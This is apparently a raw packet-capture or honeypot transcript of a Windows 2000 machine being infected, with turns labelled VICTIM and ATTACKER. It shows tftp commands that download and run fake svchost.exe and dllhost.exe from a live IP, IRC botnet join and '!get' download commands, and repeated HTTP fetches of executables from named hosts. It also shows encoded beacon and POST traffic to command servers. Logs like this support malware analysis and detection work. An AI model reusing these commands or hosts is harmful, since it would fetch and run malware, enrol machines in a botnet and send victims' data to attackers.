VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.
         	C:\\WINNT\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label.
         	 Volume Serial Number is F07B-A028
         	 Directory of C:\\WINNT\\system32\\wins
         	File Not Found
         	C:\\WINNT\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label.
         	 Volume Serial Number is F07B-A028
         	 Directory of C:\\WINNT\\system32\\dllcache
         	File Not Found
         	C:\\WINNT\\system32> 
VICTIM:  	tftp -i 98.175.55.219 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	Transfer successful: 29456 bytes in 5 seconds, 5891 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	tftp -i 98.175.55.219 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	Transfer successful: 19968 bytes in 5 seconds, 3993 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK btzgjpxe
         	USER u020500 . . :- 
VICTIM:  	Service Pack 2
         	JOIN &virtu 
ATTACKER:	:u. PRIVMSG btzgjpxe :!get http:/ii.derquda.com/rc.exe
         	:u. PRIVMSG btzgjpxe :!get http:/lb.perfectexe.com:88/kp.jpg
         	:u. PRIVMSG btzgjpxe :!get http:/www.derquda.com/mh13.txt 
VICTIM:  	GET /mh13.txt HTTP/1.0
         	User-Agent: Download
         	Host: www.derquda.com
         	Pragma: no-cache 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2F69F5DCEECA825FF3F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.4959986 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: justnewleft.ru
         	Connection: Keep-Alive
         	Pragma: no-cache 
ATTACKER:	GET /ftse2.exe?t=0.2236139 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: 68.169.42.201
         	Connection: Keep-Alive
         	Pragma: no-cache 
ATTACKER:	GET /sn.php?c=E4FA0DE98515B76701E9722B662027E5BF245335B0E2C157C1A21B5131E8F3DB511D38D5AF9334009AA17DE6C4FF8A6717EEC57FEC9F50744B7FDA7CDD773647B3FE95E017158916F9C3463CBB55B56A6A9D5568A0DE080EAA082A47A44EB8C1A6F74B5A40602887CB78C4435F5F67FD7582CCE37136F9DEABF2A5CABB0DDB650902C467F1C4C105FDC7326206C0A222&t=0.3729517 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: justnewleft.ru
         	Connection: Keep-Alive
         	Pragma: no-cache 
ATTACKER:	GET /getofferbox.php?distid=1 HTTP/1.0
         	Host: 216.119.149.6 
ATTACKER:	GET /sn.php?c=F6E8C6225ECEAF7FDC34A7FE4305AE6C1C876E0894C6049283E049031DC45E76D29E7D905A66596D0932A03BDDE651BCE51C08B2F0837357A79383257CD61A6B175A483D292B58C7C9F32E54C729D20D9F681C21EC92D2D48F2DC1ACDF3597EEA6F78594B595EF404DFEBF29BA430880CC392876134084B60C188FFAA103CB31A1B1CF662712A5620731FFACB07608772CCD&t=0.9484522 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: justnewleft.ru
         	Connection: Keep-Alive
         	Pragma: no-cache 
ATTACKER:	GET /o/0/r/63/Fun4IMV6.exe HTTP/1.0
         	Host: download.bandoo.com 
ATTACKER:	GET /cdn/o/0/r/63/Fun4IMV6.exe HTTP/1.0
         	Host: download.cdn.bandoo.com 
ATTACKER:	GET /stk17.exe?t=0.2257501 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: 68.169.45.53
         	Connection: Keep-Alive
         	Pragma: no-cache 
ATTACKER:	GET /sn.php?c=8B95D531AA3AC515978FE7D7176CD71496098BBC84A7BE2497AFA5D31ACD8DA2B0CD07E1330ECBF99DAB87EA1A1624CCAB5054EC11655F79D4B48AF099E490FB2C7D03A4ED3B8F107B41700AD03EA8772CDBA99488F6949266C4422F2BC1A8D178295F4E19394DE27AC9C94ECACAB02A31C6416ECA8DBA9D346D147B01B743FD4D4AEF48380C83402218F5A6D91EC9B7&t=0.2795221 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: justnewleft.ru
         	Connection: Keep-Alive
         	Pragma: no-cache 
ATTACKER:	GET /sn.php?c=7B65B85C6FFF72A2A4BC4F7FBDC696554ED15265F0D3851F291102745C8B113E552850B6370A695BD3E58BE6ACA0DF373AC13C842A5EEEC8ABCB4E34027F7B10065773D431E75BC45E64C2B87A9416C9AB5CA598B9C7EAECBF1DF29F7399136A7C2D5849B1914AE543F0FD6B0FF68C04AF5A653B10431C2E849096E3B416CB31E2F27ADE4D7C77B3BF8584DD8E46D2A99349&t=0.6488306 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: justnewleft.ru
         	Connection: Keep-Alive
         	Pragma: no-cache 
ATTACKER:	GET /i103.jpg?t=0.5447046 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: 109.196.134.25
         	Connection: Keep-Alive
         	Pragma: no-cache 
ATTACKER:	GET /sn.php?c=5947CC2823B3C014F6EA5C767E32C90BC969553278676BF07340E8A24F957C26C1BBBD50D7BC0C50D0BB8916C2C89C7375BBE35E1E808B94DBBF532F1FB4D1A26E10AD0B1FC7EF70F8C29DE7E30D26F90AFD82BF205EE8EE9E3C80ED3DD78CF5FAABD0C15B7B45EAD86B5BDC939355CFC33488A77E397E59C49D523DFB4DBA043E349D3A2C192BEE1724CA98C204552E&t=0.7375147 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: justnewleft.ru
         	Connection: Keep-Alive
         	Pragma: no-cache 
ATTACKER:	GET /sn.php?c=312F2ECACE5E944004185D7784C8E92BDB7B95F2EDF2C15A5F6C246E2BF181DBF28837DACBA0530FA0CBFB64555F719E529C03BE22BCA0BF4521EA966EC5FA89BBC5399FAE76F16EF1CB8BF124CA914E50A7EFD2B0CE0503E7458DE0E9035D2419488D9C6C4C8E21932034A2748DBB338174500EACFFB3820216D7A241E3BA40D9C9CB6F3A158C4E655660390CC59FE3D30F&t=0.6839868 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: justnewleft.ru
         	Connection: Keep-Alive
         	Pragma: no-cache 
ATTACKER:	GET /admin/1.exe?t=0.6584894 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: chiangmaifilm.tv
         	Connection: Keep-Alive
         	Pragma: no-cache 
ATTACKER:	GET /sn.php?c=5947D4301D8D08DD253EA7FD400609CA26EBD3E86E3FA8600C6A1A68F15C5A7586C93DD714788DBF5866C15BD8D18E66AE65F315E884AB8BB0832A5DCF63940B562D4C3669BB07987E4494EE9779AD723CCB92AF37493F3971D3731E54BEEC959FCE829399B9FF50FB48EF680C0CBD27C433CFE0F8BF8CABD48D650A2B9D5BE5747CA00462533DFE7544E4B302C557D7&t=0.1775782 HTTP/1.0
         	User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
         	Host: justnewleft.ru
         	Connection: Keep-Alive
         	Pragma: no-cache 
VICTIM:  	POST /c98dc79dsdcsc.php?ini=v22MzDS1G9TyWD5l61YdHLJrOeDmJ4Q6O41eHyF2exxSCwCA2UWMzTylUVrHIQqMgMqV7ZlNfgiBMF4cFHrzfIqRtufQpKX+Nvtstu7pkw== HTTP/1.1
         	Content-Type: application/x-www-form-urlencoded
         	Host: justtambo.in
         	User-Agent: Mozilla/6.0 (Windows; wget 3.0)
         	Content-Length: 197
         	Connection: close
         	Cache-Control: no-cache
         	data=qSrTzGL0RMCyDnY9+xJEQe5nNLundsMqfdgBGzUoJ0xVTU/DzQWC3DLbXB/UfETT1o6F2ZIbLEGVJ0NkRSTjbezD67GE5vqnba854vSIwDT7FRe+FY4kubI+3dE2Ybs2QMCcGA/DGf27Us3YIDsWkCi49R7B1MJetj5acN84zaTnmrVIPOVH9gda23cpItg= 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu